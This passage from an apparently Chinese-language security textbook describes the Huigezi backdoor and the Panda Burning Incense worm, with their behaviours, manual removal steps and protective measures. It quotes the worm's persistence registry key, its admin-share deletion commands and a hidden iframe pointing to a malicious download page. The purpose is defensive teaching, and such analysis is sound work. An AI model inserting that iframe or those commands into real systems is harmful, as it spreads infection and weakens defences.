Windows目录下的G_Server.exe文件将自己注册成服务,每次开机都能自动运行,运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。G_Server.dll文件实现后门功能,与控制端客户端进行通信;G_Server_Hook.dll则通过拦截API调用来隐藏病毒,因此中毒后查看不到病毒文件及病毒注册的服务项。随着灰鸽子服务端文件的设置不同,G_Server_Hook.dll有时候附在Explorer.exe的进程空间中,有时候则是附在所有进程中。
(2)病毒的手动清除
清除灰鸽子的服务。
打开 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注册表项,查找“game.exe”,可以找到灰鸽子的服务项如Game_Server,删除整个Game_Server项。
删除灰鸽子程序文件。
在安全模式下删除Windows目录下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件,然后重新启动计算机。
(3)防护手段
给系统安装补丁程序。如MS04-011、MS04-012、MS04-013、MS03-001、MS03-007、MS03-049、MS04-032等。
给系统管理员账户设置足够复杂足够强壮的密码;禁用/删除一些不使用的账户。
及时更新杀毒软件的病毒库。
关闭一些不需要的服务,条件允许的可关闭没有必要的共享,也包括C$、D$等管理共享。完全单机的用户可直接关闭Server服务。
不要随便打开或运行陌生、可疑文件和程序,如邮件中的奇怪附件,外挂程序等。
安装灰鸽子(Huigezi、Gpigeon)专用检测清除工具。
5.熊猫烧香病毒
(1)病毒描述
“武汉男生”,俗称“熊猫烧香”,这是一个感染型的蠕虫病毒,病毒进程为“spoclsv.exe”。它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,(.gho为GHOST的备份文件),使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。“熊猫烧香”发作时的表现见图3-7。
(2)病毒详细行为
复制自身到系统目录下: %System%\drivers\spoclsv.exe;
创建启动项:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]"svcshare"="%System%\drivers\spoclsv.exe";
在各分区根目录生成病毒副本:X:\setup.exe、X:\autorun.inf;
使用net share命令关闭管理共享:
cmd.exe /c net share X$ /del /y
cmd.exe /c net share admin$ /del /y
修改“显示所有文件和文件夹”设置:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000000
病毒尝试关闭安全软件相关窗口;
尝试结束安全软件相关进程以及Viking病毒(威金病毒)进程;
禁用安全软件相关服务;
删除安全软件相关启动项;
遍历目录修改htm/html/asp/php/jsp/aspx等网页文件,在这些文件尾部追加信息:
<iframe src="hxxp://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>
在访问过的目录下生成Desktop_.ini文件,内容为当前日期;
此外,病毒还会尝试删除GHO文件,尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其他计算机中。
病毒文件内含有这些信息:
whboy
***武*汉*男*生*感*染*下*载*者***
(3)解决方案
结束病毒进程%System%\drivers\spoclsv.exe,查看当前运行spoclsv.exe的路径,可使用超级兔子魔法设置。
删除病毒文件%System%\drivers\spoclsv.exe
删除病毒启动项:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]"svcshare"="%System%\drivers\spoclsv.exe"
通过分区盘符右键菜单中的“打开”进入分区根目录,删除根目录下的病毒文件:X:\setup.exe、X:\autorun.inf
恢复被修改的“显示所有文件和文件夹”设置:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000001
修复或重新安装被破坏的安全软件。
修复被感染的程序。可用专杀工具进行修复,如金山熊猫烧香病毒专杀工具、安天熊猫烧香病毒专杀工具、江民熊猫烧香病毒专杀工具和瑞星熊猫烧香病毒专杀工具等。